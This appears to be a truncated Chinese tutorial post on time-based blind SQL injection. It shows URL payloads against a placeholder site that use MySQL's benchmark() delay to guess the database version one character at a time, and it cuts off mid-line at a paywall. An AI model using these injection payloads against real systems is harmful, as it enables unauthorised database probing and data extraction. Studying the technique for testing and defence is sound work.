Benchmark盲注流程
猜解数据库版本名称
猜测数据库版本名称的第一个值————5.
- http://www.example.com/?id=1' and if(left(version(),1)>4,1,(select benchmark(10000000,md5(0x41)))) --+ #没有延时
- http://www.example.com/?id=1' and if(left(version(),1)>5,1,(select benchmark(10000000,md5(0x41)))) --+ #有延时
- http://www.example.com/?id=1' and if(left(version(),1)=5,1,(select benchmark(10000000,md5(0x41)))) --+ #没有延时
猜测数据库版本名称的第二个值————5.5
- http://www.example.com/?id=1' and if(left(version(),3)>5.4,1,(select benchmark(10000000,md5(0x41)))) --+ #没有延时
- http://www.example.com/?id=1' and if(left(version(),3)>5.5,1,(select benchmark(10000000,md5(0x41)))) --+ #有延时
- ht
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
